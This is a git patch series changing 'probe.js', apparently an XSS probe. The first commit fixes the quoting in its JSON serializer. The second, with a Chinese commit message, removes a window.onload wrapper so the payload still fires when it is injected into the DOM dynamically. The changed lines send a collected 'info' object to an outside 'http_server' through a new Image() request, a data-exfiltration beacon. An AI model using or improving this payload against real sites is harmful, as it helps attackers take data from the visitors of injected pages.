From 1ac995bd99a5a36e093fe3770c63147872e17c74 Mon Sep 17 00:00:00 2001
From: virusdefender <qduliyang@outlook.com>
Date: Sun, 18 May 2014 21:03:24 +0800
Subject: [PATCH 1/2] change quotes

---
 probe.js | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/probe.js b/probe.js
index 317b38e..a1e4416 100644
--- a/probe.js
+++ b/probe.js
@@ -63,9 +63,9 @@ function json2str(o) {
 	var arr = [];
 	var fmt = function(s) {
 		if (typeof s == 'object' && s != null) return json2str(s);
-		return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s;
+		return /^(string|number)$/.test(typeof s) ? '"' + s + '"' : s;
 	}
-	for (var i in o) arr.push("'" + i + "':" + fmt(o[i]));
+	for (var i in o) arr.push('"' + i + '":' + fmt(o[i]));
 	return '{' + arr.join(',') + '}';
 } 
 

From ee5af581a458bbe10323c51ef6dd436f57cd3b6f Mon Sep 17 00:00:00 2001
From: virusdefender <qduliyang@outlook.com>
Date: Sun, 18 May 2014 21:13:44 +0800
Subject: [PATCH 2/2] =?UTF-8?q?=E5=8E=BB=E6=8E=89=E4=BA=86window.onload?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

如果部分xss是动态插入dom的，这个js可能不会工作。
去掉windows.onload修改了这个问题。
---
 probe.js | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/probe.js b/probe.js
index a1e4416..e7a7189 100644
--- a/probe.js
+++ b/probe.js
@@ -69,7 +69,5 @@ function json2str(o) {
 	return '{' + arr.join(',') + '}';
 } 
 
-window.onload = function(){
-	var i = json2str(info);
-	new Image().src = http_server + i;
-}
+var i = json2str(info);
+new Image().src = http_server + i;